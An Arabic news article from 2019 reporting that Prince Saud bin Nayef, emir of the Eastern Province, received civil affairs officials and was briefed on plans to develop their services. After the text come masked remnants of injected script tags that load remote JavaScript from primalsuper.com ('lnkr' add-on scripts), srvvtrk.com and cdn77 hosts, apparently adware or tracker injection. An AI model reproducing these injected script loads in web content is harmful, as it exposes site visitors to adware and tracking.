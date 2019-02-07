شكرا لقرائتكم خبر عن الأمير سعود بن نايف يطلع على خطط تطوير خدمات «الأحوال المدنية» للمستفيدين والان نبدء بالتفاصيل

استقبل صاحب السمو الملكي الأمير سعود بن نايف بن عبد العزيز أمير المنطقة الشرقية في مكتبه بديوان الإمارة أمس وكيل وزارة الداخلية للأحوال المدنية اللواء عبد الرحمن بن إبراهيم الجلعود ومديري الإدارات العامة للأحوال المدنية على مستوى المملكة.

واطلع سموه على أبرز الخدمات التي تقدمها الأحوال المدنية للمستفيدين والخطط المستقبلية لتطوير آليات العمل، مشيدا بالنقلة النوعية التي تشهدها الأحوال المدنية، متمنيا لهم التوفيق والسداد.

ومن جانبه قدم اللواء عبد الرحمن الجلعود شكره وتقديره لسمو أمير المنطقة الشرقية على استقباله واهتمامه بفرع الوزارة في المنطقة وتوجيهاته الدائمة لمنسوبيها. ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_364579204&key=1fd3b038f796d0b159&cv=1549460938&t=1549460937819" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_262306179&key=1fd3b038f796d0b159&cv=10533&t=1549460937820" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549460937825" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********